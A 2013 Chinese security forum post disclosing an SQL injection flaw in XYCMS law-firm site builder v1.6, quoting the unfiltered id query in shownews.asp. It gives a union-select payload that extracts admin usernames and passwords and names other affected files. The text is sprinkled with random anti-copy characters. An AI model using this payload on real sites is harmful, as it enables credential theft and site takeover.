找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2159|回复: 0
打印 上一主题 下一主题

XYCMS律师事务所建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
9 i6 o4 J- Y* `( E# \0 P7 E: r, g 1 D0 _, C( }8 f/ [, y
淫荡分割线4 q2 _, z' B( e  n2 `  a9 |; M
--------------------------------------------------------
$ o7 y& ?& i1 O" K5 M , o2 }/ {/ j) y; w; O% |
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)0 Q% L& O) n& B
源码地址:http://down.chinaz.com/soft/29233.htm# m" c: }! J" E4 G( A

+ K( u7 r" i7 Q" F& h, I. A漏洞文件:shownews.asp
, |5 O* a& X# a- O漏洞代码:7-13行
7 H9 W5 H2 b& g ( A% ~# A/ [( k6 x
2 |# |  _4 L" x  u2 t( t
<% " U8 \4 N$ V  [2 R
id=request.QueryString("id"): A! o* s' q* _4 Z9 L
   
9 w, l0 B" w$ R* f/ V2 ~& Oset snews=server.createobject("adodb.recordset")
1 X1 `/ y- M4 ?: |  Xexec="select * from [news] where id="&id
& [. f8 P+ G- m; {5 msnews.open exec,conn,1,13 @& b0 M8 }  B! {' D9 V" Y
%>6 ]& L7 Q& T6 U
7 M. w- V" U, q+ C

8 b. h! B' A) e! J! V' a# }什么过滤都没有  直造成注入5 k: o- s5 L" e. g9 D4 U. Z

; A0 ]( Q5 b0 M8 `注入点:http://127.0.0.1:99/shownews.asp?id=xx
2 C2 Z% y2 T7 u0 j/ |! q0 [ + M9 t* G5 \9 u: z
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
5 i* f4 [1 M; w0 J7 F2 [1 t( _: }
" N9 f; B6 I6 \3 r
; D% y& ~4 Q  ~5 _; Y  p; Cexp: union select 1,admin,password,4,5,7 from admin_user  V) f- h& P5 X+ R1 z* I2 X
* ]* T5 a* [9 n/ }6 b( K, \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表